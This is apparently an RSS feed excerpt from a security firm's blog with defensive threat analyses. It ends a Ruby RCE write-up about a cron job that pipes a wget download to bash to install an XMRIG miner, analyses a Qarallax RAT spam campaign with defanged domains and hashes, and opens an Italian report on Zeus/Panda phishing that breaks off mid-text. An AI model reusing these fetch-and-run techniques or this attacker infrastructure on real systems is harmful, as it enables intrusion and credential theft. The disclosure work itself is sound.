    style=&quot;padding-bottom: 20.052083333333336%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAECAIAAAABPYjBAAAACXBIWXMAABYlAAAWJQFJUiTwAAAAlklEQVR42iVPCw7FIAjz/necU36iT+eSXeCVrSZgoC2Qeu8i+ka5rt2s9T6ExczWWvd9zzlVFXHhzYk6OMC1dzLV48i11JxPd8/HScRMhAo0oApzJYChoUq1Uuhb2xB/NipaSgWPgsilFCSYqgj+zIy9ohG+DP7oA3ulAfyGN2/NsbxH6JgZjhrnmNrX0ncgeN85z/P8Adkb1+ic1bHXAAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;RubyRCE3&quot;
        title=&quot;&quot;
        src=&quot;/website/static/022b1e61daba1271994251ba8a071f9a/62a6a/RubyRCE3.png&quot;
        srcset=&quot;/website/static/022b1e61daba1271994251ba8a071f9a/804b2/RubyRCE3.png 384w,
/website/static/022b1e61daba1271994251ba8a071f9a/e5715/RubyRCE3.png 768w,
/website/static/022b1e61daba1271994251ba8a071f9a/62a6a/RubyRCE3.png 1122w&quot;
        sizes=&quot;(max-width: 1122px) 100vw, 1122px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;This is a very simple bash script that adds a new entry in the crontab of the host. The cronjob is executed once per hour (notice the number 1: it means every first minute of every hour) and it downloads the file robots.txt via wget. The file is piped through bash, so most probably it’s a text file containing a shell script. By manually downloading it we can confirm our hypothesis. This is the file content:&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1122px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/74312accc6fdb2827c31a053c569be74/62a6a/RubyRCE4.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 95.83333333333334%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAATCAIAAAAf7rriAAAACXBIWXMAABYlAAAWJQFJUiTwAAACP0lEQVR42nWT23qjMAyEef/n20I42wZjc0ogSdMvd/tL7vZqqxCQjSTPjETmvXfO+dHHEPHHcRyGYRzGGALPGOfn8/n5i2WkEUpaCAGHq+t6dQZnXd+bdd1+TbbGtG3X8u/6vuurup7n5TiOq9q+77fb7bejs33bOTyEmE4j4f1+v16vrx97if0/GcKDcB77vrfG4v/wfDwez3+G/6lVUq1k2eS9tRZ6cZ63bUOwpmmh6oztlA4+dNqmJeZ+v5/HcfLjfp7ZMi9WjcNBAcN1XacpzFBfFhjNIMHiPI6enD3Ztu/Xaza4Iar1XefEpFPg156N0zShRco/1RT/NyNRe1lWWoXehBtjFWdXXkppfoyAb+qGouQDnrBNNSYrIwHK0pv9CuZNIVH4vJ8v1eyuxplpWIjknlRkSMbJT0iVhizIFVICccdNpKFoWlKZTKm/bSwFdpIXnGAyurwUJVDLsuKqyir/KHhVXqqPP3nTNHVVF/kFvJkwaZFqQNtdzh/JhyoQvEwtGx4NwxSI8X7SiQrIDPOMOLR11hI5CH9rjaMQvU39N70hdF0W9GcH/ZGQKjIk8EwMb2oi1XlnSNnBP3QklPD3YHDXGNnM4FZVNcihBxma0bRdkRf4TV1XVVUU+FWeFxqAk9ciR8kUMJ6T9LbrQQh/lGQigCpDFaOS9viQEaoIAOcpsA0MaZWBmxs4UabKOaNTTSib+EZnhg+WoiKBkSos+c4zeHIC83wqmUSVARAZHuIn+/nOdJ8X8vwLlbALk4e4bGkAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;RubyRCE4&quot;
        title=&quot;&quot;
        src=&quot;/website/static/74312accc6fdb2827c31a053c569be74/62a6a/RubyRCE4.png&quot;
        srcset=&quot;/website/static/74312accc6fdb2827c31a053c569be74/804b2/RubyRCE4.png 384w,
/website/static/74312accc6fdb2827c31a053c569be74/e5715/RubyRCE4.png 768w,
/website/static/74312accc6fdb2827c31a053c569be74/62a6a/RubyRCE4.png 1122w&quot;
        sizes=&quot;(max-width: 1122px) 100vw, 1122px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;The script checks if there is a a coinminer already in execution and, if not, it downloads the coinminer from hxxp://internetresearch[.]is/sshd (or sshd.i686), launching it afterwards. We found the coinminer used is the linux version of XMRIG Cpu Miner:
&lt;a href=&quot;https://github.com/xmrig/xmrig&quot;&gt;https://github.com/xmrig/xmrig&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;IOC&lt;/strong&gt;&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;185.130.104[.]1780 get hxxp://internetresearch[.]is/robots.txt (cronjob bash script) &quot;&gt;&lt;pre class=&quot;language-185.130.104[.]1780 get hxxp://internetresearch[.]is/robots.txt (cronjob bash script) &quot;&gt;&lt;code class=&quot;language-185.130.104[.]1780 get hxxp://internetresearch[.]is/robots.txt (cronjob bash script) &quot;&gt;
185.130.104[.]17 80 GET hxxp://internetresearch[.]is/robots.txt (x86-64 XMRIG coinminer download) 

185.130.104[.]17 80 GET hxxp://internetresearch[.]is/robots.txt (i686 XMRIG coinminer download) 

185.130.104[.]17 80 GET http://internetresearch[.]is/robots.txt (Sending system Info in User Agent) 

XMRIG Executable:
MD5:  761f5cfd0a3cddb48c73bc341a4d07a9
FileSize: 723080 bytes&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;</content:encoded></item><item><title><![CDATA[Nearly undetectable Qarallax RAT spreading via spam]]></title><description><![CDATA[Hi everyone, here's Matteo Lodi, member of the Incident Response Team. This time i want to talk about a new threat we detected randomly while analyzing the alerts generated by our platform.]]></description><link>https://www.certego.net/blog/qarallax-rat/</link><guid isPermaLink="false">qarallax-rat</guid><category><![CDATA[Blog]]></category><category><![CDATA[Cybersecurity]]></category><dc:creator><![CDATA[Matteo Lodi, Threat Intelligence Team Leader]]></dc:creator><pubDate>Mon, 04 Dec 2017 23:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Hi everyone, here&apos;s Matteo Lodi, member of the Incident Response Team.&lt;/p&gt;
&lt;p&gt;This time i want to talk about a new threat we detected randomly while analyzing the alerts generated by our platform.&lt;/p&gt;
&lt;p&gt;Everything starts from the analysis of a little and alone level 2 ET signature called &quot;&lt;em&gt;&lt;strong&gt;ET PRO POLICY DNS Query to .onion proxy Domain (onion . casa)&lt;/strong&gt;&lt;/em&gt;&quot;.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 482px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/6495b0ad60d70adf944c6350f721ab82/37e0d/QarallaxRAT1.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 9.635416666666666%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAACCAIAAADXZGvcAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAgUlEQVR42mP4//vnjz9/v7x4fn/BzPtzp96dPuHuzElAxv35M+/NmXpv9uQ7U3ruzZoMQnOmgETmTL07YyKQvD2lj+Hvzx+//v//eP/Otfqy6w3lFwvSrlTmX6srvVJZcK2u5Gp10eXSrCtVhUDBq1X5QO6V8txrtcVXKotuNyUDAL0UUbhbi9yZAAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;QarallaxRAT1&quot;
        title=&quot;&quot;
        src=&quot;/website/static/6495b0ad60d70adf944c6350f721ab82/37e0d/QarallaxRAT1.png&quot;
        srcset=&quot;/website/static/6495b0ad60d70adf944c6350f721ab82/804b2/QarallaxRAT1.png 384w,
/website/static/6495b0ad60d70adf944c6350f721ab82/37e0d/QarallaxRAT1.png 482w&quot;
        sizes=&quot;(max-width: 482px) 100vw, 482px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;At the beginning, the only evidence we got from the traffic analysis are many DNS queries followed by 4 HTTPS contacts to the following weird domain: &lt;em&gt;&lt;strong&gt;vvrhhhnaijyj6s2m[.]onion[.]casa&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;We found that onion.casa is a proxy used to access to hidden services behind the renowned TOR network. In details, if we visit the site, we can find that the domain in question hosts a site which claim to sell a malware known as &lt;em&gt;&lt;strong&gt;Qarallax&lt;/strong&gt;&lt;/em&gt;.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 951px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/692cc7205e2ece20ffa212890fc5f45d/9b379/QarallaxRAT2.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 38.28125000000001%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAICAIAAAB2/0i6AAAACXBIWXMAAAsTAAALEwEAmpwYAAABLklEQVR42oWQ3WqDQBCF9020hiDV4PoDfbc+US/6EEkMklz1QlEiAQsxkBKDu2tiE/OjPdGmVy39YIczu3NmdpcYhiFJkizLDy030Wq5RVEUROlXZJmoqqppmq7rVNMe+33Tsp5U1en1DEoHgA5M27Rt23EcSimiaZoQtmUhJ67rjsfj0Wjked5wOISeet7EdSct2PF9P0mSOI6DIAjDMIqi24KezQjjXIiCc77b7fb7vRCCMXY8Hq/Xa13XzZ265Xw+F0WBStQfqopwBvs3eZ6zewqNeLlcOtvpdCrLErYsy1arVZqmm82GZNstHF1pdQeTDwe0rn6GY2bXFH4cdQXk+eXtdfqOe2FI8zdohGfP53PERbaIlx/L9Zas809eVs1/oDX8+JTujnifEOILt8Vf+QF3dUQAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;QarallaxRAT2&quot;
        title=&quot;&quot;
        src=&quot;/website/static/692cc7205e2ece20ffa212890fc5f45d/9b379/QarallaxRAT2.png&quot;
        srcset=&quot;/website/static/692cc7205e2ece20ffa212890fc5f45d/804b2/QarallaxRAT2.png 384w,
/website/static/692cc7205e2ece20ffa212890fc5f45d/e5715/QarallaxRAT2.png 768w,
/website/static/692cc7205e2ece20ffa212890fc5f45d/9b379/QarallaxRAT2.png 951w&quot;
        sizes=&quot;(max-width: 951px) 100vw, 951px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;Qarallax&lt;/strong&gt;&lt;/em&gt; is a RAT (remote access tool) and infostealer. This malware was born from an open-source software known &lt;em&gt;&lt;strong&gt;LaZagne&lt;/strong&gt;&lt;/em&gt;. At this time, this artifact let an attacker to execute different kinds of operations inside the infected machine:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Catch mouse movements and clicks&lt;/li&gt;
&lt;li&gt;Catch keyboard inputs&lt;/li&gt;
&lt;li&gt;Record the output of the webcam and of the screen&lt;/li&gt;
&lt;li&gt;Find and steal every kind of credential stored inside the machine&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;There&apos;s a group called &lt;em&gt;&lt;strong&gt;Quaverse&lt;/strong&gt;&lt;/em&gt; which claim to be the R&amp;#x26;D behind this threat, constantly working to evolve and upgrade the malware. Their objective is to sell the agent as a RaaS (RAT as a Service).&lt;/p&gt;
&lt;p&gt;The file is a JAVA application that runs on operating systems with JAVA Runtime Environment (JRE) installed. It runs silently in the background without any indication to the user.&lt;/p&gt;
&lt;p&gt;At this time, we had no evidence that the host that contacted the suspicious domain is infected, but we are strongly suggested to investigate further to understand if this is a real threat.&lt;/p&gt;
&lt;p&gt;We tried to look for some intelligence feeds from the internet, looking if someone else has found some useful infos about the domain in question. At the beginning, we checked from Google, Twitter and Reverse but we didn&apos;t found anything. Then, checking VirusTotal, we found that they list the following URL as a malicious one: hxxps://vvrhhhnaijyj6s2m[.]onion[.]casa/storage/cryptOutput/0.92915600%201512026521.jar&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1083px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/4ebc2a42fd89e9c12a8f39d1d3518164/eb4a1/QarallaxRAT3.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 42.96875%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAIAAAC9o5sfAAAACXBIWXMAAAsTAAALEwEAmpwYAAABM0lEQVR42n1QW1KEMBDM/Q/jz5YXsNTSC7gILBuBYnnkTULYB8EG/NEqt6szmaTSM50haZpqrb33TdNQSsuyLIoiyw5A09TGaKWk1kpwwRjnXHQdtz1/ftcPjx3Z7XZRFI2rWAhR13WaJtH+I9rvkRRFXuQ5IkCP9AjSr7KkL2/502tDkvQAwTiOKGv6HhFt4/gzieNjlqE554yxDmzbtq7RArFl3YnzisxFdasafzn7YXDOwT92JQGxGFaA3AjA+UZUqaoT8caf3SobvFsxeG96IyQX4helXDy0LSx01QrC5HS5TtZaOLfOQoxksNYohWn94TI5VF3GtoDAT5imeZ5DCFhL0tuQ0lmZeb3/D3hPMGH43A6oAnUwizgoE25TuAuCb8DNz2kTWxeyPEgdrrf74m87xPo1+23MYgAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;QarallaxRAT3&quot;
        title=&quot;&quot;
        src=&quot;/website/static/4ebc2a42fd89e9c12a8f39d1d3518164/eb4a1/QarallaxRAT3.png&quot;
        srcset=&quot;/website/static/4ebc2a42fd89e9c12a8f39d1d3518164/804b2/QarallaxRAT3.png 384w,
/website/static/4ebc2a42fd89e9c12a8f39d1d3518164/e5715/QarallaxRAT3.png 768w,
/website/static/4ebc2a42fd89e9c12a8f39d1d3518164/eb4a1/QarallaxRAT3.png 1083w&quot;
        sizes=&quot;(max-width: 1083px) 100vw, 1083px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;Wow, only 3 hits and no sample uploaded to VT. However, at that time, we got an idea about what the SSL connections did: downloading a &lt;em&gt;&lt;strong&gt;.jar&lt;/strong&gt;&lt;/em&gt; file containing, with high probability, the malware.&lt;/p&gt;
&lt;p&gt;Meanwhile, we contacted the client and, luckily, the host infected was a virtual machine that got reverted to a clean state and the AV Agent detected and stopped the execution of the malware.&lt;/p&gt;
&lt;p&gt;Afterwards, the real questions were:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;how did they get the malware?&lt;/li&gt;
&lt;li&gt;was the attack targeted or opportunistic?&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The day after, inside our spamtrap, we retrieved a sample called &quot;IMG6587JPG..jar&quot;, identified as malicious (8.2/10 score) by our sandbox. The first thing where we put our attention was the traffic this sample generated towards the suspicious domain.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 522px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/a419aaa2a1b2fe0c840382f022da57f2/29492/QarallaxRAT4.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 17.708333333333332%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAECAIAAAABPYjBAAAACXBIWXMAAAsTAAALEwEAmpwYAAAArElEQVR42nWLuw6DMAxF+f9/QiQQQouEmGBLnIcTiSK1hFDmmi6dah1Z1zrXheacgKbRda2qSpWlrrlijE7NrgAUSHFGlmoghKqYH4Y4TYWVrW5qI6XtOhL0adoWxFW6eozR6fveCuE66W+d7+9OtnEcl3ku1mU5cs7bllPK+5f049j37fX01qBzhAUI3kXE6D0aU6yP9TzP958hlVJCxBACAFhjYowBA21E/ABHXM8imgZXZQAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;QarallaxRAT4&quot;
        title=&quot;&quot;
        src=&quot;/website/static/a419aaa2a1b2fe0c840382f022da57f2/29492/QarallaxRAT4.png&quot;
        srcset=&quot;/website/static/a419aaa2a1b2fe0c840382f022da57f2/804b2/QarallaxRAT4.png 384w,
/website/static/a419aaa2a1b2fe0c840382f022da57f2/29492/QarallaxRAT4.png 522w&quot;
        sizes=&quot;(max-width: 522px) 100vw, 522px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;That&apos;s it! Probably we found the malware our client got and, luckily, it came from a normal email spam tricking the user to open a fake image containing the infostealer.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 707px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/4c5514d843cfb9a3a574db142797084e/394f7/QarallaxRAT5.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 38.541666666666664%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAICAIAAAB2/0i6AAAACXBIWXMAAAsTAAALEwEAmpwYAAABBUlEQVR42m1RSZLDIAz0/x84OdjDGszmDQPxdVpKuSaHdJVByK2lpcE5t6zrk+HcjKf3Adj2/cXo/fUV13UNUsgQvNLa2qcxRkppjEUeZKq1lqPgPMo/TqCU4yi990FrBCjAWiuE0IhXCqHTOMEfY9r3PQE5J76WZck5xxCRBME6hOhmn1NGwzFG7z1OSAB3XVew3x7YFBbTwqDgafpF2dnN+NFag6syYPfeKr/QKN2t3iAStT2OEyq/m2mMevPKWT7oZ6uUmgyugZkNj58HOsSo1T0opbTl0UOREJifgUdJBZpWGn7ohnikGCAGIyFVKcHOfJLabSM/NkGLi/gyAw3z/miBf4tGuS/L0xwkAAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;QarallaxRAT5&quot;
        title=&quot;&quot;
        src=&quot;/website/static/4c5514d843cfb9a3a574db142797084e/394f7/QarallaxRAT5.png&quot;
        srcset=&quot;/website/static/4c5514d843cfb9a3a574db142797084e/804b2/QarallaxRAT5.png 384w,
/website/static/4c5514d843cfb9a3a574db142797084e/394f7/QarallaxRAT5.png 707w&quot;
        sizes=&quot;(max-width: 707px) 100vw, 707px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;Fun fact was that only 4 AV engines detected it. After 4 hours, finally, some other antivirus products started to identify that threat as malicious (15).&lt;/p&gt;
&lt;p&gt;We said that to our client who could find the email that was the infection vector and send it to us. The Qarallax variant was almost identical to the one we caught just some minutes before. The only thing that changed was the email body (different language, from english to italian) and the name of the sample: PAGAMENTO.jar. Even in this case, the first time we send the sample to VT, only few antivirus were able to identify it.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Update&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;We detected some new similar samples. The malware capabilities are the same as before. The biggest difference is the proxy used to contact the C&amp;#x26;C server: from onion[.]casa to onion[.]top. We want to underline that the threat is evolving day by day: every new sample we get to analyze is almost undetected by every kind of AV engine.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1139px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/a32a688bbf68227d0ffa4d8df5ab3561/5f6dd/QarallaxRAT6.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 33.33333333333333%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAIAAACHqfpvAAAACXBIWXMAAAsTAAALEwEAmpwYAAABB0lEQVR42mWPy3KEIBBF+f9/ySo/ErPLbBw1yvstyOAgabEmWeRUV1dz4XbTSArhvVdKTdO0LMs8z8Mw3IdeCP4bnDNKGedQCcaEMeLtXX18TqjrOiGE1hpeWWvB2ff9OI2tzzfGZ0MIjPFlvqK/k3Gckfy6bdYZa2F4WFcYQSlhjFprjNEQtuWz+8vJGKcUE4JRCTlt2/lza/y6xhCc91JwKeE7UikJBSStFNgIBRvHmMwNpF0GUn5kZXbjotI5ncQYYRoskrakVy29AmVtwCTQnXMIepdSaq2CjzGYmvfajoBrQCEfiiZe/4FgnfIs9ag4S/+MIB0vQgh5z6DY7GTSx/F3dfEDw6eJ1qU9GrsAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;QarallaxRAT6&quot;
        title=&quot;&quot;
        src=&quot;/website/static/a32a688bbf68227d0ffa4d8df5ab3561/5f6dd/QarallaxRAT6.png&quot;
        srcset=&quot;/website/static/a32a688bbf68227d0ffa4d8df5ab3561/804b2/QarallaxRAT6.png 384w,
/website/static/a32a688bbf68227d0ffa4d8df5ab3561/e5715/QarallaxRAT6.png 768w,
/website/static/a32a688bbf68227d0ffa4d8df5ab3561/5f6dd/QarallaxRAT6.png 1139w&quot;
        sizes=&quot;(max-width: 1139px) 100vw, 1139px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Conclusion&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;We found a new spam campaing delivering a RAT malware, nearly undetectable by IDS Signatures or AV engines.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;IOC&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Domains:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;vvrhhhnaijyj6s2m[.]onion[.]casa&quot;&gt;&lt;pre class=&quot;language-vvrhhhnaijyj6s2m[.]onion[.]casa&quot;&gt;&lt;code class=&quot;language-vvrhhhnaijyj6s2m[.]onion[.]casa&quot;&gt;vvrhhhnaijyj6s2m[.]onion[.]top
vvrhhhnaijyj6s2m[.]onion[.]top&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;RAT samples (MD5):&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;6d921290e0cacf6663890aa3dcb94845&quot;&gt;&lt;pre class=&quot;language-6d921290e0cacf6663890aa3dcb94845&quot;&gt;&lt;code class=&quot;language-6d921290e0cacf6663890aa3dcb94845&quot;&gt;f441dc0388afd3c4bca8a2110e1fa610
682f0260cd0bb8716d32485eebfe1d31
cb9da672613decdc800849a45f21c0b8
d77cfa2b68c744f3ba62f2e49a598ffa
d9adbb40a0ae557c5bf1d2dd2f85409d
42ecb562506ec1734cc291c0092753c5
702f6c5856591accb8cdd4bcfc46e114&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;</content:encoded></item><item><title><![CDATA[A pesca con Cedacriall]]></title><description><![CDATA[Da Aprile 2017 le piattaforme di threat intelligence di Certego hanno iniziato a seguire alcune particolari campagne di spam volte a diffondere trojan bancari su target italiani.]]></description><link>https://www.certego.net/blog/a-pesca-con-cedacriall/</link><guid isPermaLink="false">a-pesca-con-cedacriall</guid><category><![CDATA[Blog]]></category><category><![CDATA[Cybersecurity]]></category><pubDate>Thu, 22 Jun 2017 22:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Da Aprile 2017 le piattaforme di threat intelligence di Certego hanno iniziato a seguire alcune particolari campagne di spam volte a diffondere trojan bancari su target italiani.&lt;/p&gt;
&lt;p&gt;La particolarità di queste campagne è di utilizzare come download zone per i propri payload siti aventi sempre cedacriall come dominio di secondo livello e certificati gratuiti firmati dal progetto &lt;a href=&quot;https://letsencrypt.org/&quot;&gt;Let’s Encrypt&lt;/a&gt;.&lt;/p&gt;
&lt;h1&gt;Il malware: Zeus/Panda&lt;/h1&gt;
&lt;p&gt;Panda (o Zeus/Panda) è il nome con cui viene comunemente indicata una variante del malware bancario Zeus.&lt;/p&gt;
&lt;p&gt;I malware appartenenti a questa famiglia sono solitamente utilizzati per compiere attacchi di tipo Man in the Browser, una volta infettato un host il malware prende il controllo dei browser installati registrando ogni dato immesso e/o alterando le sessioni di accesso ad alcuni siti.&lt;/p&gt;
&lt;p&gt;Inoltre questa famiglia di malware agisce come una botnet: ogni macchina infetta è collegata ad una serie specifica di server di Comando e Controllo (CnC). Il malware periodicamente contatta il proprio server CnC, comunicandovi le informazioni raccolte e richiedendo nuove configurazioni su cosa monitorare.&lt;/p&gt;
&lt;h1&gt;Le campagne&lt;/h1&gt;
&lt;h3&gt;04/04/2017 - Fattura Amministrazione&lt;/h3&gt;
&lt;p&gt;La prima diffusione registrata dai nostri sistemi risale al 4 Aprile di quest’anno, descritta in &lt;a href=&quot;https://myonlinesecurity.co.uk/invio-fatturaordine-italian-malspam-with-embedded-ole-object-lnk-files-delivers-some-sort-of-malware/&quot;&gt;questo articolo su My Online Security&lt;/a&gt;. Le mail di phishing rilevate avevano i seguenti oggetti:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;inviofattura/invoice&quot;&gt;&lt;pre class=&quot;language-inviofattura/invoice&quot;&gt;&lt;code class=&quot;language-inviofattura/invoice&quot;&gt;fattura del 04\04\2017
Invio fattura/ordine
ordine 04.04.2017
fattura del 04.04.2017&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Le mail in questione avevano contenuti simili al seguente:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;gentilecliente,&quot;&gt;&lt;pre class=&quot;language-gentilecliente,&quot;&gt;&lt;code class=&quot;language-gentilecliente,&quot;&gt;al pagamento della fattura in allegato alla presente.
Grazie
Confidando nel Vostro sollecito riscontro, inviamo i nostri distinti saluti.
Amministrazione&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Tutte le mail rilevate avevano i medesimi allegati, due documenti Word&lt;/p&gt;
